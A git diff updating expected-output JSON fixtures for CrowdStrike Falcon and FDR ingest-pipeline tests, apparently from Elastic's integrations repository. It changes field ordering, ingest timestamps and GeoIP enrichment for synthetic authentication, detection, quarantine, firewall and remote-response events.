@@ "user": { "name": "alice@company.com", "email": "alice@company.com" - } - }, - { - "source": { - "ip": "192.168.6.8" }, - "message": "CrowdStrike Authentication", "tags": [ "preserve_original_event" - ], + ] + }, + { "event.action": "two_factor_authenticate", "@timestamp": "2020-02-13T13:50:14.754Z", "ecs": { @@ -615,8 +608,11 @@ "192.168.6.8" ] }, + "source": { + "ip": "192.168.6.8" + }, "event": { - "ingested": "2021-12-09T13:36:08.382679300Z", + "ingested": "2021-12-14T14:41:23.505206073Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 8,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601814754,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601814754\n }\n}", "category": [ "authentication" 
@@ -627,6 +623,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UTCTimestamp": "2020-02-13T13:50:14.754Z", @@ -647,16 +644,12 @@ "user": { "name": "alice@company.com", "email": "alice@company.com" - } - }, - { - "source": { - "ip": "192.168.6.8" }, - "message": "CrowdStrike Authentication", "tags": [ "preserve_original_event" - ], + ] + }, + { "event.action": "self_accept_eula", "@timestamp": "2020-02-13T13:50:20.289Z", "ecs": { @@ -670,8 +663,11 @@ "192.168.6.8" ] }, + "source": { + "ip": "192.168.6.8" + }, "event": { - "ingested": "2021-12-09T13:36:08.382685300Z", + "ingested": "2021-12-14T14:41:23.505206649Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 9,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601820289,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"selfAcceptEula\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601820289\n }\n}", "category": [ "authentication" @@ -682,6 +678,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UTCTimestamp": "2020-02-13T13:50:20.289Z", @@ -702,7 +699,10 @@ "user": { "name": "alice@company.com", "email": "alice@company.com" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "@timestamp": "2020-02-13T14:14:22.000Z", 
@@ -721,7 +721,7 @@ "ip": "192.168.6.8" }, "event": { - "ingested": "2021-12-09T13:36:08.382690900Z", + "ingested": "2021-12-14T14:41:23.505207042Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 10,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1581603262000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"detection_update\",\n \"ServiceName\": \"detections\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"detection_id\",\n \"ValueString\": \"ldt:5a6fd0b7347440cd74cb84855a8aee18:17180539745\"\n },\n {\n \"Key\": \"new_state\",\n \"ValueString\": \"in_progress\"\n },\n {\n \"Key\": \"assigned_to\",\n \"ValueString\": \"First Last\"\n },\n {\n \"Key\": \"assigned_to_uid\",\n \"ValueString\": \"first.last@company.com\"\n }\n ],\n \"UTCTimestamp\": 1581603262\n }\n}", "kind": "event", "action": "user_activity_audit_event", diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json index 6be007be91c..825d1331df8 100644 --- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json 
@@ -62,7 +62,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:36:09.420125Z", + "ingested": "2021-12-14T14:41:24.741364419Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 294564,\n \"eventType\": \"DetectionSummaryEvent\",\n \"eventCreationTime\": 1582101000000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"ProcessStartTime\": 1536846339,\n \"ProcessEndTime\": 0,\n \"ProcessId\": 38684386611,\n \"ParentProcessId\": 38682494050,\n \"ComputerName\": \"alice-laptop\",\n \"UserName\": \"alice\",\n \"DetectName\": \"Process Terminated\",\n \"DetectDescription\": \"Terminated a process related to the deletion of backups, which is often indicative of ransomware activity.\",\n \"Severity\": 4,\n \"SeverityName\": \"High\",\n \"FileName\": \"explorer.exe\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume1\\\\Windows\",\n \"CommandLine\": \"C:\\\\Windows\\\\Explorer.EXE\",\n \"SHA256String\": \"6a671b92a69755de6fd063fcbe4ba926d83b49f78c42dbaeed8cdb6bbc57576a\",\n \"MD5String\": \"ac4c51eb24aa95b77f705ab159189e24\",\n \"MachineDomain\": \"CORP-DOMAIN\",\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/ec86abd353824e96765ecbe18eb4f0b4\",\n \"SensorId\": \"7c808b4c8878433287eea53d4a8c3268\",\n \"DetectId\": \"ldt:ec86abd353824e96765ecbe18eb4f0b4:38655257584\",\n \"LocalIP\": \"192.168.12.51\",\n \"MACAddress\": \"00-00-00-11-22-33\",\n \"Tactic\": \"Malware\",\n \"Technique\": \"Ransomware\",\n \"Objective\": \"Falcon Detection Method\",\n \"PatternDispositionDescription\": \"Prevention, process killed.\",\n \"PatternDispositionValue\": 16,\n \"PatternDispositionFlags\": {\n \"Indicator\": false,\n \"Detect\": false,\n \"InddetMask\": false,\n \"SensorOnly\": false,\n \"Rooting\": false,\n \"KillProcess\": true,\n \"KillSubProcess\": false,\n \"QuarantineMachine\": false,\n \"QuarantineFile\": false,\n \"PolicyDisabled\": false,\n \"KillParent\": false,\n \"OperationBlocked\": false,\n 
\"ProcessBlocked\": false\n }\n }\n}", "kind": "alert", "action": "Prevention, process killed.", @@ -141,7 +141,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:36:09.420134300Z", + "ingested": "2021-12-14T14:41:24.741367019Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1824,\n \"eventType\": \"IncidentSummaryEvent\",\n \"eventCreationTime\": 1583295476766,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"IncidentStartTime\": 1583295228,\n \"IncidentEndTime\": 1583295470,\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/crowdscore/incidents/details/inc:8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"State\": \"open\",\n \"FineScore\": 1.2\n }\n}", "kind": "alert", "action": "incident", @@ -186,7 +186,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:09.420138700Z", + "ingested": "2021-12-14T14:41:24.741367511Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 22865,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1593186952000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"Crowdstrike\",\n \"UserIp\": \"\",\n \"OperationName\": \"quarantined_file_update\",\n \"ServiceName\": \"quarantined_files\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"quarantined_file_id\",\n \"ValueString\": \"35b35a53da374816a6b471cf09e12019_a076d3121743755f2d4f8d4d5807f0bc013177f7847d09b48e76de88ace08c78\"\n },\n {\n \"Key\": \"action_taken\",\n \"ValueString\": \"quarantined\"\n }\n ],\n \"UTCTimestamp\": 1593186952\n }\n}", "kind": "event", "action": "user_activity_audit_event", diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json index b7a41c8d63e..d2bd9e67b00 100644 
--- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json @@ -43,7 +43,7 @@ "name": "TESTDEVICE01" }, "event": { - "ingested": "2021-12-09T13:36:09.744769800Z", + "ingested": "2021-12-14T14:41:25.113534666Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 70689,\n \"eventType\": \"FirewallMatchEvent\",\n \"eventCreationTime\": 1595248906000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"DeviceId\": \"718af202ab2c4ba5b6a5d10d39c0e0a5\",\n \"CustomerId\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"Ipv\": \"ipv4\",\n \"CommandLine\": \"\",\n \"ConnectionDirection\": \"1\",\n \"EventType\": \"FirewallRuleIP4Matched\",\n \"Flags\": {\n \"Audit\": false,\n \"Log\": false,\n \"Monitor\": true\n },\n \"HostName\": \"TESTDEVICE01\",\n \"ICMPCode\": \"\",\n \"ICMPType\": \"\",\n \"ImageFileName\": \"\",\n \"LocalAddress\": \"10.37.60.194\",\n \"LocalPort\": \"445\",\n \"MatchCount\": 1,\n \"MatchCountSinceLastReport\": 1,\n \"NetworkProfile\": \"2\",\n \"PID\": \"206158879910\",\n \"PolicyName\": \"PROD-FW-Workstations-General\",\n \"PolicyID\": \"74e7f1552a3a4d90a6d65578642c8584\",\n \"Protocol\": \"6\",\n \"RemoteAddress\": \"10.37.60.21\",\n \"RemotePort\": \"54952\",\n \"RuleAction\": \"2\",\n \"RuleDescription\": \"\",\n \"RuleFamilyID\": \"fec73e96a1bf4481be582c3f89b234fa\",\n \"RuleGroupName\": \"SMB Rules\",\n \"RuleName\": \"Inbound SMB Block \\u0026 Log Private\",\n \"RuleId\": \"4877172638743447345\",\n \"Status\": \"\",\n \"Timestamp\": \"2020-07-20T12:41:44Z\",\n \"TreeID\": \"\"\n }\n}", "code": "FirewallRuleIP4Matched", "kind": "event", 
@@ -108,7 +108,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:36:09.744778800Z", + "ingested": "2021-12-14T14:41:25.113536820Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57181,\n \"eventType\": \"IncidentSummaryEvent\",\n \"eventCreationTime\": 1595005328414,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"IncidentStartTime\": 1595005316,\n \"IncidentEndTime\": 1595005316,\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/crowdscore/incidents/details/inc:1234567893cd4e55b3a832ba2140478e:72e291e40c1544d390eabf135d875e54\",\n \"State\": \"open\",\n \"FineScore\": 0.1,\n \"LateralMovement\": 0\n }\n}", "kind": "alert", "action": "incident", @@ -144,13 +144,6 @@ ] }, { - "source": { - "ip": "67.43.156.15" - }, - "message": "Crowdstrike Authentication", - "tags": [ - "preserve_original_event" - ], "event.action": "saml2_assert", "@timestamp": "2020-07-20T12:26:10.093Z", "ecs": { 
@@ -164,8 +157,11 @@ "67.43.156.15" ] }, + "source": { + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:36:09.744784800Z", + "ingested": "2021-12-14T14:41:25.113537270Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 70509,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1595247970093,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"first.last@company.com\",\n \"UserIp\": \"67.43.156.15\",\n \"OperationName\": \"saml2Assert\",\n \"ServiceName\": \"Crowdstrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1595247970,\n \"AuditKeyValues\": [\n {\n \"Key\": \"trace_id\",\n \"ValueString\": \"b0b33836-555c-4e0e-a5ef-d368f6799f6b\"\n },\n {\n \"Key\": \"actor_user\",\n \"ValueString\": \"first.last@company.com\"\n },\n {\n \"Key\": \"actor_user_uuid\",\n \"ValueString\": \"123ab123-abc1-12a1-12a1-12a1ab12a1a1\"\n },\n {\n \"Key\": \"actor_cid\",\n \"ValueString\": \"123456a1ab1a12abc12ab1234abcd12a\"\n },\n {\n \"Key\": \"target_user\",\n \"ValueString\": \"first.last@company.com\"\n }\n ]\n }\n}", "category": [ "authentication" @@ -176,6 +172,7 @@ "kind": "event", "outcome": "success" }, + "message": "Crowdstrike Authentication", "crowdstrike": { "event": { "UserIp": "67.43.156.15", @@ -218,7 +215,10 @@ "user": { "name": "first.last@company.com", "email": "first.last@company.com" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "@timestamp": "2020-07-20T12:41:25.000Z", 
@@ -231,7 +231,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:09.744790600Z", + "ingested": "2021-12-14T14:41:25.113537663Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 70683,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1595248885000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"Crowdstrike\",\n \"UserIp\": \"\",\n \"OperationName\": \"quarantined_file_update\",\n \"ServiceName\": \"quarantined_files\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"quarantined_file_id\",\n \"ValueString\": \"ab1cde05567b455b93afbe2d3df352c9_328024a065630f897f09963d4b67b0c95d4054f540c2ca8014d5b012718bfa21\"\n },\n {\n \"Key\": \"action_taken\",\n \"ValueString\": \"quarantined\"\n }\n ],\n \"UTCTimestamp\": 1595248885\n }\n}", "kind": "event", "action": "user_activity_audit_event", @@ -293,7 +293,7 @@ "name": "TESTDEVICE01" }, "event": { - "ingested": "2021-12-09T13:36:09.744796500Z", + "ingested": "2021-12-14T14:41:25.113538062Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57217,\n \"eventType\": \"RemoteResponseSessionStartEvent\",\n \"eventCreationTime\": 1595006093000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"330633db-1cda-4355-b0d8-2c2edc91fe3e\",\n \"HostnameField\": \"TESTDEVICE01\",\n \"UserName\": \"first.last@company.com\",\n \"StartTimestamp\": 1595006093\n }\n}", "kind": "event", "action": [ 
@@ -349,7 +349,7 @@ "name": "TESTDEVICE01" }, "event": { - "ingested": "2021-12-09T13:36:09.744802300Z", + "ingested": "2021-12-14T14:41:25.113538445Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57269,\n \"eventType\": \"RemoteResponseSessionEndEvent\",\n \"eventCreationTime\": 1595006899000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"330633db-1cda-4355-b0d8-2c2edc91fe3e\",\n \"HostnameField\": \"TESTDEVICE01\",\n \"UserName\": \"first.last@company.com\",\n \"EndTimestamp\": 1595006899,\n \"Commands\": [\n \"cd \\\\Program Files (x86)\\\\Symantec\",\n \"ls .\",\n \"cd \\\\Program Files (x86)\",\n \"ls .\",\n \"reg query HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CrowdStrike\\\\{9b03c1d9-3138-44ed-9fae-d9f4c034b88d}\\\\{16e0423f-7058-48c9-a204-725362b67639}\\\\Default\",\n \"reg set HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CrowdStrike\\\\{9b03c1d9-3138-44ed-9fae-d9f4c034b88d}\\\\{16e0423f-7058-48c9-a204-725362b67639}\\\\Default GroupingTags -ValueType=```REG_SZ``` -Value=```Protect```\",\n \"reg query HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CrowdStrike\\\\{9b03c1d9-3138-44ed-9fae-d9f4c034b88d}\\\\{16e0423f-7058-48c9-a204-725362b67639}\\\\Default\",\n \"restart\",\n \"restart -Confirm\"\n ]\n }\n}", "kind": "event", "action": [ 
@@ -466,7 +466,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:09.744808Z", + "ingested": "2021-12-14T14:41:25.113538836Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57047,\n \"eventType\": \"DetectionSummaryEvent\",\n \"eventCreationTime\": 1595002291000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"ProcessStartTime\": 1595002290,\n \"ProcessEndTime\": 1595002290,\n \"ProcessId\": 663790158277,\n \"ParentProcessId\": 627311656469,\n \"ComputerName\": \"TESTDEVICE01\",\n \"UserName\": \"First.last\",\n \"DetectName\": \"NGAV\",\n \"DetectDescription\": \"This file meets the machine learning-based on-sensor AV protection's low confidence threshold for malicious files.\",\n \"Severity\": 2,\n \"SeverityName\": \"Low\",\n \"FileName\": \"filename.exe\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\",\n \"CommandLine\": \"\\\"C:\\\\ProgramData\\\\file\\\\path\\\\filename.exe\\\" \",\n \"SHA256String\": \"0a123b185f9a32fde1df59897089014c92e3d08a0533b54baa72ba2a93d64deb\",\n \"MD5String\": \"0ab1235adca04aef6239f5496ef0a5df\",\n \"SHA1String\": \"0000000000000000000000000000000000000000\",\n \"MachineDomain\": \"NA\",\n \"ExecutablesWritten\": [\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939Configuration.mexw64\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n },\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939Configuration.mexw64\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n },\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939CanPackMessage.mexw64\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n },\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939CanPackMessage.mexw64\",\n 
\"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n }\n ],\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/activity/detections/detail/1abcd2345b8c4151a0cb45dcfbe6d3d0/124559902719?_cid=12345a1bc2d34fghi56jk7890lmno12p\",\n \"SensorId\": \"1abcd2345b8c4151a0cb45dcfbe6d3d0\",\n \"IOCType\": \"hash_sha256\",\n \"IOCValue\": \"0a123b185f9a32fde1df59897089014c92e3d08a0533b54baa72ba2a93d64deb\",\n \"DetectId\": \"ldt:1abcd2345b8c4151a0cb45dcfbe6d3d0:124559902719\",\n \"LocalIP\": \"10.1.190.117\",\n \"MACAddress\": \"54-ad-d4-d2-a8-0b\",\n \"Tactic\": \"Machine Learning\",\n \"Technique\": \"Sensor-based ML\",\n \"Objective\": \"Falcon Detection Method\",\n \"PatternDispositionDescription\": \"Detection, process would have been blocked if related prevention policy setting was enabled.\",\n \"PatternDispositionValue\": 2304,\n \"PatternDispositionFlags\": {\n \"Indicator\": false,\n \"Detect\": false,\n \"InddetMask\": false,\n \"SensorOnly\": false,\n \"Rooting\": false,\n \"KillProcess\": false,\n \"KillSubProcess\": false,\n \"QuarantineMachine\": false,\n \"QuarantineFile\": false,\n \"PolicyDisabled\": true,\n \"KillParent\": false,\n \"OperationBlocked\": false,\n \"ProcessBlocked\": true,\n \"RegistryOperationBlocked\": false,\n \"CriticalProcessDisabled\": false,\n \"BootupSafeguardEnabled\": false,\n \"FsOperationBlocked\": false\n },\n \"ParentImageFileName\": \"\\\\Device\\\\HarddiskVolume2\\\\Windows\\\\explorer.exe\",\n \"ParentCommandLine\": \"C:\\\\Windows\\\\Explorer.EXE\",\n \"GrandparentImageFileName\": \"\\\\Device\\\\HarddiskVolume2\\\\Windows\\\\System32\\\\userinit.exe\",\n \"GrandparentCommandLine\": \"C:\\\\Windows\\\\system32\\\\userinit.exe\"\n }\n}", "kind": "alert", "action": "Detection, process would have been blocked if related prevention policy setting was enabled.", 
diff --git a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json index bd9effe6e83..2ecf75d415a 100644 --- a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json +++ b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json @@ -27,12 +27,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffa63e404bba4bff7465ab3afb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffa63e404bba4bff7465ab3afb", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:21.137Z", "ecs": { 
@@ -50,7 +59,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150573500Z", + "ingested": "2021-12-14T14:41:26.533745830Z", "original": "{\"ParentProcessId\":\"362225661973273550\",\"SourceProcessId\":\"362225661973273550\",\"aip\":\"67.43.156.14\",\"SessionProcessId\":\"363970027584976556\",\"SyntheticPR2Flags\":\"8\",\"event_platform\":\"Mac\",\"SVUID\":\"501\",\"id\":\"ffffffff-1111-11eb-8dd4-061759968cdf\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677521162\",\"ProcessGroupId\":\"363970027584976556\",\"event_simpleName\":\"SyntheticProcessRollup2\",\"RawProcessId\":\"9505\",\"ContextTimeStamp\":\"1625677521.137\",\"GID\":\"20\",\"ConfigStateHash\":\"1620585913\",\"SVGID\":\"20\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"501\",\"CommandLine\":\"/bin/sh -s unix:cmd\",\"TargetProcessId\":\"363970027584976556\",\"ImageFileName\":\"/bin/sh\",\"RGID\":\"501\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"SyntheticProcessRollup2MacV3\",\"RUID\":\"501\",\"aid\":\"ffffffffa63e404bba4bff7465ab3afb\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:21.162Z", "kind": "event", @@ -87,6 +96,23 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffff3c0846978560dbc0048d6555", + "type": "agent", + "version": "1007.4.0013701.1" + }, "process": { "entity_id": "365053603452626914", "pid": 33454, 
@@ -94,24 +120,10 @@ "id": 0 } }, + "@timestamp": "2021-07-07T17:05:23.068Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff3c0846978560dbc0048d6555", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2021-07-07T17:05:23.068Z", "ecs": { "version": "1.12.0" }, @@ -127,7 +139,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150583Z", + "ingested": "2021-12-14T14:41:26.533748610Z", "original": "{\"FileDeletedCount\":\"0\",\"DirectoryCreatedCount\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"event_platform\":\"Mac\",\"NetworkBindCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"id\":\"ffffffff-1111-11eb-9d75-02bcf3ade03b\",\"NewExecutableWrittenCount\":\"0\",\"NetworkCloseCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"SuspectStackCount\":\"0\",\"timestamp\":\"1625677524102\",\"event_simpleName\":\"EndOfProcess\",\"RawProcessId\":\"33454\",\"ContextTimeStamp\":\"1625677523.068\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053603452626914\",\"AsepWrittenCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"NetworkCapableAsepWriteCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"TargetProcessId\":\"365053603452626914\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"name\":\"EndOfProcessMacV15\",\"aid\":\"ffffffff3c0846978560dbc0048d6555\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:24.102Z", "kind": "event", @@ -162,7 +174,13 @@ "EffectiveTransmissionClass": "3", "SuspectStackCount": 0, "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { 
@@ -174,18 +192,12 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 546, @@ -194,18 +206,12 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 547, @@ -224,12 +230,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffffc59c473aa7fcbbe7438082cb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffc59c473aa7fcbbe7438082cb", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:48.594Z", "ecs": { 
@@ -249,7 +264,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150589500Z", + "ingested": "2021-12-14T14:41:26.533749122Z", "original": "{\"event_simpleName\":\"RawBindIP6\",\"ContextTimeStamp\":\"1625677488.594\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"RemoteAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1620585913\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"365042236081053654\",\"RemotePort\":\"546\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"547\",\"Entitlements\":\"15\",\"name\":\"RawBindIP6MacV10\",\"id\":\"ffffffff-1111-11eb-ad8d-064c77be2fd1\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffffc59c473aa7fcbbe7438082cb\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677488615\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:48.615Z", "kind": "event", @@ -309,12 +324,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff59fe460783ea45d59e417d6f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff59fe460783ea45d59e417d6f", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:04.527Z", "ecs": { 
